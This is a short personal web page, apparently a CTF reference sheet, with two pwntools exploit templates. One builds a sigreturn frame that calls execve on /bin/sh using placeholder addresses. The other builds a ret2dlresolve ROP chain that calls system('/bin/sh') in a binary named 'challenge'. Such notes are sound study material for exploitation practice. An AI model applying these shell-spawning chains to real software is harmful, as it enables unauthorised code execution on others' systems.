emile.space r2wa.rs

            
            

1. rop


            
            

1.1. SIGROP

from pwn import *
      
BIN_SH = 0xcafebabe   # addr of "/bin/sh\x00"
SYSCALL = 0xdeadbeef  # addr of syscall instruction 
       
frame = SigreturnFrame(kernel="amd64")
frame.rax = constants.SYS_execve
frame.rdi = BIN_SH
frame.rsi = 0x0
frame.rdx = 0x0
frame.rip = SYSCALL
       
payload = bytes(frame)

Talk

1.2. Ret2dlresolve

from pwn import *
     
exe = context.binary = ELF('challenge')
    
dlresolve = Ret2dlresolvePayload(exe, symbol="system", args=["/bin/sh\x00"])
# dlresolve.data_addr # Addr of RW memory area
# dlresolve.payload   # fake structures
   
rop = ROP(exe)
rop.read(0, dlresolve.data_addr) # ROP to read fake structures
rop.ret2dlresolve(dlresolve)     # ROP to call _dl_runtime_resolve
>
raw_rop = rop.chain()            # Full ROP chain

Talk




rss feed of @hanemile@emile.space lieu webring search engine XXIIVV webring activitypub ring
emile - 1734444930.911766s - generated using vokobe "0.1.3"